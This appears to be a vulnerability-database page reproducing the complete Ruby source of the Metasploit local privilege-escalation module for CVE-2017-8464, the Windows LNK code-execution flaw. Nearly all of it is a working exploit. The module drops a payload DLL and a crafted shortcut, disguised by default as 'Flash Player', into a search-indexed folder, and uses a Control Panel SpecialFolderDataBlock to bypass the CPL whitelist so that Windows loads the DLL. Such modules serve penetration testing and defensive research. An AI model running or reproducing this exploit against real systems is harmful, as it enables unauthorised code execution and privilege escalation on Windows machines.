LNK Code Execution Vulnerability

2017-10-05T14:16:31
ID MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2017_8464_LNK_LPE
Type metasploit
Reporter Rapid7
Modified 2020-10-02T20:00:37

Description

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. The PATH option must be an absolute path to a writeable directory which is indexed for searching. If no PATH is specified, the module defaults to %USERPROFILE%.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Windows::Priv

  attr_accessor :exploit_dll_name

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'            => 'LNK Code Execution Vulnerability',
        'Description'     => %q{
          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
          that contain a dynamic icon, loaded from a malicious DLL.

          This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
          similar except an additional SpecialFolderDataBlock is included. The folder ID set
          in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
          the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
          DLL file.

          The PATH option must be an absolute path to a writeable directory which is indexed for
          searching. If no PATH is specified, the module defaults to %USERPROFILE%.
        },
        'Author'          =>
          [
            'Uncredited',      # vulnerability discovery
            'Yorick Koster',   # msf module
            'Spencer McIntyre' # msf module
          ],
        'License'         => MSF_LICENSE,
        'References'      =>
          [
            ['CVE', '2017-8464'],
            ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
            ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup
            ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format
            ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],
            ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']
          ],
        'DefaultOptions'  =>
          {
            'EXITFUNC'         => 'process',
            'FileDropperDelay' => 15,
            'WfsDelay'         => 30
          },
        'Arch'            => [ARCH_X86, ARCH_X64],
        'Payload'         =>
          {
            'Space'       => 2048
          },
        'Platform'        => 'win',
        'Targets'         =>
          [
            [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
            [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultTarget'   => 0, # Default target is Automatic
        'DisclosureDate'  => '2017-06-13',
        'Notes'           =>
          {
            'Stability'   => [ CRASH_SERVICE_RESTARTS, ],
            'SideEffects' => [ ARTIFACTS_ON_DISK, ],
          },
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [false, 'The LNK file']),
        OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),
        OptString.new('PATH', [false, 'An explicit path to where the files should be written to'])
      ]
    )

    register_advanced_options(
      [
        OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
        OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
      ]
    )
  end

  def check
    if session.sys.process['SearchIndexer.exe']
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def get_name(option, default_ext)
    name = datastore[option].to_s.strip
    name = "#{rand_text_alpha(16)}.#{default_ext}" if name.blank?
    name
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if session.platform != 'windows'
      fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
    end

    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end

    if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
    arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
    datastore['EXE::Path'] = path
    datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")

    path = datastore['PATH'] || session.sys.config.getenv('USERPROFILE')
    path.chomp!("\\")

    dll_path = "#{path}\\#{get_name('DLLNAME', 'dll')}"
    write_file(dll_path, generate_payload_dll)

    lnk_path = "#{path}\\#{get_name('FILENAME', 'lnk')}"
    write_file(lnk_path, generate_link(dll_path))
    register_files_for_cleanup(dll_path, lnk_path)
  end

  def file_rm(file)
    if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true)
      @dropped_files.delete(file)
    end
  end

  def generate_link(path)
    vprint_status("Generating LNK file to load: #{path}")
    path += "\x00" # Do not use << here
    display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
    comment = datastore['LnkComment'].dup << "\x00"

    # Control Panel Applet ItemID with our DLL
    cpl_applet = [
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00
    ].pack('C*')
    cpl_applet << [path.length].pack('v')
    cpl_applet << [display_name.length].pack('v')
    cpl_applet << path.unpack('C*').pack('v*')
    cpl_applet << display_name.unpack('C*').pack('v*')
    cpl_applet << comment.unpack('C*').pack('v*')

    # LinkHeader
    ret = [
      0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
      0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
      0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
      0x00, 0x00, 0x00, 0x00, # FileAttributes
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
      0x00, 0x00, 0x00, 0x00, # FileSize
      0x00, 0x00, 0x00, 0x00, # IconIndex
      0x00, 0x00, 0x00, 0x00, # ShowCommand
      0x00, 0x00, # HotKey
      0x00, 0x00, # Reserved1
      0x00, 0x00, 0x00, 0x00, # Reserved2
      0x00, 0x00, 0x00, 0x00  # Reserved3
    ].pack('C*')

    # IDList
    idlist_data = ''
    # ItemID = ItemIDSize (2 bytes) + Data (variable)
    idlist_data << [0x12 + 2].pack('v')
    idlist_data << [
      # All Control Panel Items
      0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
      0x30, 0x9d
    ].pack('C*')
    # ItemID = ItemIDSize (2 bytes) + Data (variable)
    idlist_data << [cpl_applet.length + 2].pack('v')
    idlist_data << cpl_applet
    idlist_data << [0x00].pack('v') # TerminalID

    # LinkTargetIDList
    ret << [idlist_data.length].pack('v') # IDListSize
    ret << idlist_data

    # ExtraData
    # SpecialFolderDataBlock
    ret << [
      0x10, 0x00, 0x00, 0x00, # BlockSize
      0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
      0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
      0x14, 0x00, 0x00, 0x00  # Offset in LinkTargetIDList
    ].pack('C*')
    # TerminalBlock
    ret << [0x00, 0x00, 0x00, 0x00].pack('V')
    ret
  end
end